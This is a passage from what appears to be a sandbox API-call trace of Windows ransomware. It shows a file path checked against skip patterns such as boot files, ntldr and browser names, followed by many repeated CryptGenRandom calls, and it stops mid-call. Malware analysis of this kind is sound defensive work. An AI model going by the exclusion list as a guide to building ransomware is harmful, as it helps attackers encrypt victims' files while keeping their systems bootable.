PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*Atheros*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*Realtek*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*bootmgr*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*boot*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*boot*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*IO.SYS*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*ntldr*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*chrome*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*opera*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*firefox*") returned 0 [0146.213] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", pszSpec="*") returned 1 [0146.213] strlen (_Str="NMoreira") returned 0x8 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.216] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: 